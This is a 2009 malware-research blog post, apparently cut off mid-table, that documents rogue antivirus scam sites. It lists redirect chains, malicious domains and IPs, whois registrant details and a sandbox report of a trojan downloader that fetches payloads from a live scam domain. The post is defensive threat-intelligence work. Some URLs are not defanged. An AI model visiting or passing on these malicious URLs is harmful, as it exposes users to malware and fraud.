alt=""id="BLOGGER_PHOTO_ID_5320113270215315778" /></a> <br /><br />Other on the same site:<br /><br />hxxp://securecleanersolution.com/2009/101/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXeeI0KsI/AAAAAAAAARo/v0AJZE5H3Mw/s1600-h/securecleanersolution.com-fake-scanner3.jpg"><img style="cursor:pointer; cursor:hand;width: 282px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXeeI0KsI/AAAAAAAAARo/v0AJZE5H3Mw/s320/securecleanersolution.com-fake-scanner3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113978317482690" /></a> <br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXefesRBI/AAAAAAAAARw/Usi7-jq5Byk/s1600-h/securecleanersolution.com-fake-scanner4.jpg"><img style="cursor:pointer; cursor:hand;width: 279px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXefesRBI/AAAAAAAAARw/Usi7-jq5Byk/s320/securecleanersolution.com-fake-scanner4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113978677675026" /></a> <br /><br />hxxp://securecleanersolution.com/2009/103/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeraNsXI/AAAAAAAAAR4/pe6CNFirOkA/s1600-h/securecleanersolution.com-fake-scanner5.jpg"><img style="cursor:pointer; cursor:hand;width: 310px; height: 320px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeraNsXI/AAAAAAAAAR4/pe6CNFirOkA/s320/securecleanersolution.com-fake-scanner5.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113981880119666" /></a> <br /><br />hxxp://securecleanersolution.com/2009/104/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdTXer7uw8I/AAAAAAAAASA/qaSNYzZo3ks/s1600-h/securecleanersolution.com-fake-scanner6.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 247px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdTXer7uw8I/AAAAAAAAASA/qaSNYzZo3ks/s320/securecleanersolution.com-fake-scanner6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113982020699074" /></a> <br /><br />hxxp://securecleanersolution.com/2009/105/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeu512vI/AAAAAAAAASI/lQhZS-vDRl4/s1600-h/securecleanersolution.com-fake-scanner7.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 265px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeu512vI/AAAAAAAAASI/lQhZS-vDRl4/s320/securecleanersolution.com-fake-scanner7.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113982818081522" /></a> <br /><br />hxxp://securecleanersolution.com/2009/1000/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTY79Uac8I/AAAAAAAAASQ/ISSavgrv288/s1600-h/securecleanersolution.com-fake-scanner14.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 181px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTY79Uac8I/AAAAAAAAASQ/ISSavgrv288/s320/securecleanersolution.com-fake-scanner14.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320115584415462338" /></a> <br /><br />hxxp://securecleanersolution.com/2009/1002/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTZUiX_VRI/AAAAAAAAASY/dffOInIDAjw/s1600-h/securecleanersolution.com-fake-scanner8.jpg"><img style="cursor:pointer; cursor:hand;width: 190px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTZUiX_VRI/AAAAAAAAASY/dffOInIDAjw/s320/securecleanersolution.com-fake-scanner8.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320116006679434514" /></a> <br /><br />hxxp://evenmorestats.com/in.cgi?7 (<a href="http://wepawet.iseclab.org/view.php?hash=69c58b0a65a3e2f9861f60225eaae754&t=1238565174&type=js" target="_blank">Analysis</a>)<br />redirect to: <br />hxxp://advancesoftwaretool.com/2009/142/?a=&l=&f=&ex=&ed=&h=&sub=&prodabbr=3P_UVSM<br /><br />hxxp://evenmorestats.com/in.cgi?8<br />redirect to: <br />hxxp://goforuniq.com/in.cgi?9&gai=-o2z&gli=&gff=<br />then<br />hxxp://spywareprotectiontool.com/2009/142/?a=&l=&f=&ex=&ed=&sub=&prodabbr=USRM<br /><br />hxxp://evenmorestats.com/in.cgi?9<br />redirect to: <br />hxxp://goforuniq.com/in.cgi?9&gai=-o2z&gli=&gff=<br />then<br />hxxp://promotion-offer.com/srm/adv/142/?a=-o2z&l=&f=&ex=&ed=&sub=&prodabbr=USRM<br /><br />Other on the same site: promotion-offer.com [89.248.168.46]<br /><br />hxxp://promotion-offer.com/srm/adv/140/?a=-o2z&l=&f=&ex=&ed=&sub=&prodabbr=USRM<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTadHEnW7I/AAAAAAAAASw/o0kPhbpQm5c/s1600-h/promotion-offer.com-fake-scanner3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 229px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTadHEnW7I/AAAAAAAAASw/o0kPhbpQm5c/s320/promotion-offer.com-fake-scanner3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117253480864690" /></a> <br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTadV9RAPI/AAAAAAAAAS4/Mc1X0RwMiac/s1600-h/promotion-offer.com-fake-scanner4.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 233px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTadV9RAPI/AAAAAAAAAS4/Mc1X0RwMiac/s320/promotion-offer.com-fake-scanner4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117257476571378" /></a> <br /><br />hxxp://promotion-offer.com/srm/adv/141/?a=-o2z&l=&f=&ex=&ed=&sub=&prodabbr=USRM<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTacmucAxI/AAAAAAAAASg/MXmA4BRHtzI/s1600-h/promotion-offer.com-fake-scanner1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTacmucAxI/AAAAAAAAASg/MXmA4BRHtzI/s320/promotion-offer.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117244797911826" /></a> <br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTac69L-AI/AAAAAAAAASo/YblJPS-LMbQ/s1600-h/promotion-offer.com-fake-scanner2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTac69L-AI/AAAAAAAAASo/YblJPS-LMbQ/s320/promotion-offer.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117250228484098" /></a> <br /><br />hxxp://promotion-offer.com/srm/adv/142/?a=-o2z&l=&f=&ex=&ed=&sub=&prodabbr=USRM <br /><br />Sometimes it redirect to another location <br />hxxp://evenmorestats.com/in.cgi?9<br />redirect to: <br />hxxp://removespywarethreats.com/2009/142/?a=&l=&f=&ex=&ed=&sub=pdt&prodabbr=USRM <br />(old template - no screenshot) <br />or<br />hxxp://pcantimalwaresolution.com/2009/141/<br />hxxp://pcantimalwaresolution.com/2009/142/<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTfqXbyp-I/AAAAAAAAATA/u4eJG-lTAi8/s1600-h/pcantimalwaresolution.com-fake-scanner1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTfqXbyp-I/AAAAAAAAATA/u4eJG-lTAi8/s320/pcantimalwaresolution.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320122978769479650" /></a> <br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTfqpL84kI/AAAAAAAAATI/pYjmmhZDYNA/s1600-h/pcantimalwaresolution.com-fake-scanner2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTfqpL84kI/AAAAAAAAATI/pYjmmhZDYNA/s320/pcantimalwaresolution.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320122983534879298" /></a> <a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTfqXbyp-I/AAAAAAAAATA/u4eJG-lTAi8/s1600-h/pcantimalwaresolution.com-fake-scanner1.jpg"></a> <br /><br />hxxp://desktoprepairpackage.com/2009/5?a=cspsant1p&l=273<br />&f=cs_6247616163&ex=&ed=&h=&sub=&prodabbr=3P_UVSM<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTg-V4gFbI/AAAAAAAAATg/scl0ksvtOw8/s1600-h/desktopprepairpackage.com-fake-scanner1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 286px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTg-V4gFbI/AAAAAAAAATg/scl0ksvtOw8/s320/desktopprepairpackage.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124421462037938" /></a> <br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTg-jPAApI/AAAAAAAAATo/VrhBUqg9MNM/s1600-h/desktopprepairpackage.com-fake-scanner2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTg-jPAApI/AAAAAAAAATo/VrhBUqg9MNM/s320/desktopprepairpackage.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124425046065810" /></a> <br /><br />hxxp://desktoprepairpackage.com/2009/142/ (old template - no screenshot)<br />hxxp://desktoprepairpackage.com/2009/14/ (old template - no screenshot)<br /><br />hxxp://desktoprepairpackage.com/2009/2/?a=cspvm-sst&l=370&f=cs_4384615693&ex=1&ed=2&h=&sub=csp&prodabbr=3P_UVSM<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdThfZ7nQ3I/AAAAAAAAATw/j1ydVepXiRQ/s1600-h/desktopprepairpackage.com-fake-scanner5.jpg"><img style="cursor:pointer; cursor:hand;width: 284px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdThfZ7nQ3I/AAAAAAAAATw/j1ydVepXiRQ/s320/desktopprepairpackage.com-fake-scanner5.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124989484516210" /></a> <br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdThfg5XoeI/AAAAAAAAAT4/1pT-njTNbNo/s1600-h/desktopprepairpackage.com-fake-scanner6.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdThfg5XoeI/AAAAAAAAAT4/1pT-njTNbNo/s320/desktopprepairpackage.com-fake-scanner6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124991354151394" /></a> <br /><br />hxxp://desktoprepairpackage.com/2009/142/?a=cspsni-sst&l=373&f=cs_7794016513&ex=1&ed=2&h=&sub=csp&prodabbr=3P_UVSM (old template - no screenshot)<br /><br />Other screenshot:<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTi2ZNtFDI/AAAAAAAAAUA/agII9B0VuAo/s1600-h/removespywarethreats.com-fake-scanner1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTi2ZNtFDI/AAAAAAAAAUA/agII9B0VuAo/s320/removespywarethreats.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320126483940578354" /></a> <br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTi2he_xxI/AAAAAAAAAUI/RLL6BBOXo0M/s1600-h/removespywarethreats.com-fake-scanner2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTi2he_xxI/AAAAAAAAAUI/RLL6BBOXo0M/s320/removespywarethreats.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320126486160590610" /></a> <br /><br /><hr />Some interesting search on google for "Spyware.Wather.ic" and "Spyware.CreditCarder.y" also reveal:<br /><br />antispywareexpertplus.com<br />antivirus-xp-pro-2009.com on 91.212.65.43<br />antispywareexpert-plus.com <br />asxp-2009.com<br />as-xp-2009.com <br />av-pro2009.com<br />aviruspro2009.com <br />homeav-2009.com on 94.75.253.92<br />pc-virusremover2008.com <br />pcsolutionshelp.com on 94.102.51.14<br />powerfulvirusremover2008.com <br />virusremover2008-offer.com <br />virusremover-2008.com on 70.38.73.26<br />xp-p-center.com <br />xpas2009.com <br />xppcenter.com<br />xpprotcenter.com<br />xp-protection-center.com<br />xpsecuritycentral.com on 66.63.167.50<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdWiWyZqEeI/AAAAAAAAAVQ/yHxtN4AipRw/s1600-h/full-of-scam.jpg"><img style="cursor:pointer; cursor:hand;width: 114px; height: 400px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdWiWyZqEeI/AAAAAAAAAVQ/yHxtN4AipRw/s400/full-of-scam.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320337047178318306" /></a> <br /><br />and <br />78.46.99.173 - "Hetzner Online AG". Looking on the google cache for this page reveal <br />the common email address: at @virusremover2008.com <br /><hr />Previous IP for virusremover-2008.com - 200.115.173.29 (Flagged on sorbs). Now 70.38.73.26<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdWiNREJdbI/AAAAAAAAAVI/Gr34H1DJH-I/s1600-h/virusremover-2008.com-200.115.173.29.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 75px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdWiNREJdbI/AAAAAAAAAVI/Gr34H1DJH-I/s320/virusremover-2008.com-200.115.173.29.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320336883610908082" /></a> <br /><br /> Also quite interesting with 58.65.233.33 sharing IP for other name servers including ns1.removespywarethreats.com<br />
<br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdWl3aFSEJI/AAAAAAAAAVY/qOSYvRwetWc/s1600-h/ns1.removespywarethreats.com-58.65.233.33.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 129px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdWl3aFSEJI/AAAAAAAAAVY/qOSYvRwetWc/s320/ns1.removespywarethreats.com-58.65.233.33.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320340906120974482" /></a><p><br /> <br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-7486404152711641640?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-25378368244379274822009-03-29T23:32:00.000-07:002009-03-29T23:44:58.440-07:00Black Hat SEO and Rogue Antivirus p.3<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="529" height="1516" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="833"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br />AntivirusPlus ZlKon Malware drop - liveinternetmarketingltd.com<br /></p><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td> </tr></table><p>In addition to fake scanner domain, recent research also reveal that several sites are <br />registered through "EVOPLUS LTD" with the information as follow:<br /><br />Registrant:<br />Live Internet Marketing Limited ****@liveinternetmarketingltd.com<br />attn: Private Registrations<br />5285 Decarie Boulevard #100<br />Montreal, QC H3W3C2<br />Canada<br />+1-514-371-5650<br /><br />Domain Name: LIVEINTERNETMARKETINGLTD.COM<br />Registrar: EVOPLUS LTD<br />Whois Server: whois.evonames.com<br />Referral URL: http://www.evonames.com<br />Name Server: NS1.LIVEINTERNETMARKETINGLTD.COM<br />Name Server: NS2.LIVEINTERNETMARKETINGLTD.COM<br />Status: clientDeleteProhibited<br />Status: clientTransferProhibited<br />Status: clientUpdateProhibited<br />Updated Date: 27-mar-2009<br />Creation Date: 20-feb-2009<br />Expiration Date: 20-feb-2010<br /><br />Registered Through:<br />AdvancedHosters.com (http://www.AdvancedHosters.com)<br /><br />******************************<br /><br /> Looking on google show absolutely no web presence apart from malware and pornography websites:<br /><br />For <a href="http://www.google.com/search?hl=en&q="liveinternetmarketingltd"" target="_blank">"liveinternetmarketingltd"</a>: Malware domain drop and pornography websites<br />For <a href="http://www.google.com/search?hl=en&q="Live+Internet+Marketing+Limited"" target="_blank">"Live Internet Marketing Limited"</a>: Pornography websites<br />For <a href="http://www.google.com/search?hl=en&q="liveinternetmarketingltd.com"" target="_blank">"liveinternetmarketingltd.com"</a>: Pornography websites and malware domain found by Malware Domain List.<br /><br />Looking on malwaredomainlist show 23 sites with the registrant information "liveinternetmarketingltd.com".<br /><br />Some domain have been added to the list below:<br /><br />antivirus-plus-new.com<br />antivirusplussite.com<br /> bestinternetexamine.com<br />bestnetcheckonline.com<br />bestwebexamine.com<br />downloadantivirusplus.com<br />easynetcheckonline.com<br />easywebchecklive.com<br />easywebexamine.com<br />easywebscanlive.com<br />internethomecheck.com<br />linkcanlive.com<br />linkcanonline.com<br />linkcanpro.com<br />myantivirusplus.com<br />myinternetexamine.com<br />onlinescanweb.com<br />rapldhsare.com<br />safeyouthnet.com<br />security-check-center.com<br />securesoftinternet.com<br />theantivirusplus.com<br />websecurecheck.com<br />websmartcheck.com<br />websportscheck.com<br />yourinternetexamine.com<br />yournetascertain.com<br />yournetcheckonline.com<br />yournetcheckonline.com<br />yourwebexamine.com<br />yourwebscanlive.com<br />yourwebscanpro.com<br /><br /> **********************<br /><br /> <u>SUSPENDED domain</u><br /><br />Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br /><br /><b>antivirusplus.biz</b><br />***<br /><b>antivirusplus2009.net</b><br /><a href="https://safeweb.norton.com/report/show?name=antivirusplus2009.net" target="_blank">Symantec Result</a><br /> Registration Service Provided By: HIGH QUALITY HOST COMPANY<br /> ***<br /><b>avplus2009.com</b><br /><a href="https://safeweb.norton.com/report/show?name=avplus2009.com" target="_blank">Symantec Result</a> <br /> PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br /> *** <br /><b>internet-check.net</b><br /> PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br />*** <b><br />traffchecking.com</b><br />Registration Service Provided By: ERDOMAIN.COM<br />Registrant: uebochek - Luhansk Oblast,01001 - UA - uebochek@gmail.com<br /><br /><br />********************** </p><p><u>ACTIVE domain</u><br /><br />*** <br /><b>av-plus-support.com</b><br />PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br />*** <br /><br />antivirusplussite.com has a fake error page which redirect to downloadantivirusplus.com/buy.php?id=<br /><br />downloadantivirusplus.com is also hosted on the same IP at ZlKon, also registered by "Live Internet Marketing Limited" and the fraudulent payment page is on the domain below:<br /><br />https://secure-plus-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert=<br /><br />209.8.25.204 - ns1.secure-plus-payments.com<br /><br /> Registration Service Provided By: RESELLERCLUB</p> <p>Registrant:<br />Globo inc<br />John Sparck (sparck000@mail.com)<br />South reg, 14 st, 3<br />Atoll<br />,3290867<br />BB<br />Tel. +27.221994</p> <p>"Globo inc" include: antivirus--plus.com, plus-antivirus.com (Already suspended)</p> <p> **********************<br />Looking on <a href="http://www.spamhaus.org/query/bl?ip=94.247.2.215" target="_blank">spamhaus</a> also reveal<br /><br />newp-digital.com <br />webspywareremover2009.com <br />cure-soft.com [63.219.177.210]<br />innovagest2000s.com<br />secure-softwaretools.com [207.226.175.124]<br />**********************<br /><br /><br />Host on 94.247.2.215 [hs.2-215.zlkon.lv] AS12553<br /><br />AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd.<br /><br />Some screenshot<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGXhhCI/AAAAAAAAAQ4/oYQGr3c6cnA/s1600-h/yournetascertain.jpg"><img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGXhhCI/AAAAAAAAAQ4/oYQGr3c6cnA/s320/yournetascertain.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786689603306530" /></a><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGzFR7I/AAAAAAAAAQw/4VZad901kB4/s1600-h/downloadantivirusplus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 297px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGzFR7I/AAAAAAAAAQw/4VZad901kB4/s320/downloadantivirusplus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786689718896562" /></a><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdAgT-JVOpI/AAAAAAAAAQo/1ILrYgNdBKw/s1600-h/bestwebexamine.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 298px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdAgT-JVOpI/AAAAAAAAAQo/1ILrYgNdBKw/s320/bestwebexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786687396297362" /></a><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgT8dyayI/AAAAAAAAAQg/mutAb--Dc_U/s1600-h/bestinternetexamine.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgT8dyayI/AAAAAAAAAQg/mutAb--Dc_U/s320/bestinternetexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786686945225506" /></a><br />
<br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr><tr><td width="16" height="208" valign="top"><br /></td><td width="514"><br /><table width="514" border="0" cellspacing="0" cellpadding="0"><tr><td width="17"> </td><td width="99"><b>File info</b>:</td><td colspan="2">installer_1.exe</td><td width="62"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">666112 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">03a1e599d66c64cd11eb5f20d3645767</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis:</b></td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=14a7afddf1abf91e4dda10a549589bfba" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=03a1e599d66c64cd11eb5f20d3645767" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/6bd9da2d0000574b72634ea98f9b4245" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.27.2009 17:40:50 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">17/38 (44.74%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="225"><span style="color:#FF0000">Trojan.Win32.FakeXPA!IK</span></td><td width="111">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">TR/Crypt.XPACK.Gen</span></td><td>Antivir</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">SHeur2.YCE</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td>CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.DownLoad.33473</span></td><td>DrWeb</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Delf.swq</span></td><td>F-Secure</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">W32/FakeAV.NW!tr</span></td><td>Fortinet</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td>Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td width="225"><span style="color:#FF0000">Trojan-Downloader.Win32.Delf.swq</span></td><td>Kaspersky</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic Downloader.x</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic Downloader.x</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Crypt.XPACK.Gen</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">TrojanDownloader:Win32/Renos.BAO</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td>Panda</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Troj/FakeAV-NW</span></td><td>Sophos</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Fakeavalert.B</span></td><td>Sunbelt</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan Horse</span></td><td>Symantec</td><td> </td></tr></table><br />We can see on <a href="http://malware-web-threats.blogspot.com/2009/03/easynetcheckonline-fraudtool-win32.html">this post</a> that the file downloaded two or three days after is updated with a new code.<br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Result when running:</b></td></tr><tr><td height="200"> </td><td> <br /> HTTP Request: 94.247.2.215 [hs.2-215.zlkon.lv]<br /><br />GET: myantivirusplus.com/install/AntivirusPlus.exe <br />GET: myantivirusplus.com/install/InternetExplorer.dll <br />GET: myantivirusplus.com/cfg/dmns.cfg <br /><br /><br /><table width="370" border="0" cellspacing="0" cellpadding="0"><tr><td width="19"> </td><td width="92"><b>File info</b>:</td><td width="226">AntivirusPlus.exe</td><td width="33"> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>File size</td><td>1435136 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>f0bc697765f31bd431e776387aca2c7f</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td><a href="http://anubis.iseclab.org/?action=result&task_id=1ce304ec73cca52440dd2b9bf9be6006b" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank">First Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank">Second Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>First received</td><td>03.27.2009 14:17:34 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 7/39 (17.95%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Second time</td><td>03.30.2009 05:23:52 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 12/39 